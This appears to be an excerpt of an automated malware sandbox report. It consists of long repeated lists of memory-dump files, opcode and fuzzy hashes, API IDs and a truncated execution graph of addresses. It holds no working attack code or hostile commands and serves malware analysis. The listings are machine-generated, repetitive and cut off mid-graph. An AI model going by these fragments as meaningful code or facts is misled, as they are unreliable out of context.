                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                          • Instruction ID: 3039332004ef8cb7fdc81c045a5ed66136b015af03a623c9f02c3f20aac902cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A113BB7203165C7EE04862DF8B45B7A795FBD53217AC4375C041CB784DA22A4C19500
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                          • Instruction ID: 040eb3a2a0d3cb3514e41e31bb5990bf07ef7ac788f8ada15755a865908d2d26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E04672922228EBCB18DB9CC904A8AB2ACFB49B00B650096B515D3250C270DE40C7D1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                          • Instruction ID: 3d0c40809e8f1c5d6c831d06fed29bfd2a8905eb0712f3857490cdbc02384d44
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83B135329442999FDB11CF68C881BFEBFE9FF45340F14816AE855EB242D6349D81CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1418687624-0
                                                                                                                                                                                                                                          • Opcode ID: dbd6efbc5f3ba47d77eeb80be58fbaea4e5d261750e5b692d67d40a4abd10625
                                                                                                                                                                                                                                          • Instruction ID: a2cdc31b42a2a33ace0becaebf5a4d4e94718e9d607eab3d5f6229a70cf1aa5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbd6efbc5f3ba47d77eeb80be58fbaea4e5d261750e5b692d67d40a4abd10625
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BA1F270A06649DFDB21DF66C948B6AB7F8FF19310F048129E915D7341EB39EA04CB91

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.9%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:608
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                          execution_graph 10256 b74276 10257 b72410 4 API calls 10256->10257 10258 b7427f 10257->10258 10448 b75f76 10450 b75f81 shared_ptr 10448->10450 10449 b75ffe shared_ptr __floor_pentium4 10450->10449 10451 b75c10 3 API calls 10450->10451 10452 b766ac 10451->10452 10453 b75c10 3 API calls 10452->10453 10454 b766b1 10453->10454 10455 b722c0 3 API calls 10454->10455 10456 b766c9 shared_ptr 10455->10456 10457 b75c10 3 API calls 10456->10457 10458 b7673d 10457->10458 10459 b722c0 3 API calls 10458->10459 10461 b76757 shared_ptr 10459->10461 10460 b75c10 3 API calls 10460->10461 10461->10460 10462 b722c0 3 API calls 10461->10462 10463 b76852 shared_ptr __floor_pentium4 10461->10463 10462->10461 10299 ba8bbe 10302 ba8868 10299->10302 10301 ba8bdc 10303 ba887a 10302->10303 10304 ba690a __cftof 3 API calls 10303->10304 10307 ba888f __dosmaperr ___std_exception_copy 10303->10307 10306 ba88bf 10304->10306 10305 ba6d52 3 API calls 10305->10306 10306->10305 10306->10307 10307->10301 9738 b742b0 9741 b73ac0 9738->9741 9740 b742bb shared_ptr 9742 b73af9 9741->9742 9745 b73c38 9742->9745 9746 b73b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 9742->9746 9751 b732d0 9742->9751 9744 b732d0 5 API calls 9748 b73c5f 9744->9748 9745->9744 9745->9748 9746->9740 9747 b73c68 9747->9740 9748->9747 9770 b73810 9748->9770 9774 b8c6ac 9751->9774 9753 b7336b 9780 b8c26a 9753->9780 9756 b7333c __Mtx_unlock 9757 b8c26a 4 API calls 9756->9757 9761 b73350 __floor_pentium4 9756->9761 9758 b73377 9757->9758 9760 b8c6ac GetSystemTimePreciseAsFileTime 9758->9760 9759 b73314 9759->9753 9759->9756 9777 b8bd4c 9759->9777 9762 b733af 9760->9762 9761->9745 9763 b8c26a 4 API calls 9762->9763 9764 b733b6 __Cnd_broadcast 9762->9764 9763->9764 9765 b8c26a 4 API calls 9764->9765 9766 b733d7 __Mtx_unlock 9764->9766 9765->9766 9767 b8c26a 4 API calls 9766->9767 9768 b733eb 9766->9768 9769 b7340e 9767->9769 9768->9745 9769->9745 9771 b7381c 9770->9771 9855 b72440 9771->9855 9784 b8c452 9774->9784 9776 b8c6b9 9776->9759 9801 b8bb72 9777->9801 9779 b8bd5c 9779->9759 9781 b8c292 9780->9781 9783 b8c274 9780->9783 9781->9781 9783->9781 9807 b8c297 9783->9807 9785 b8c4a8 9784->9785 9787 b8c47a 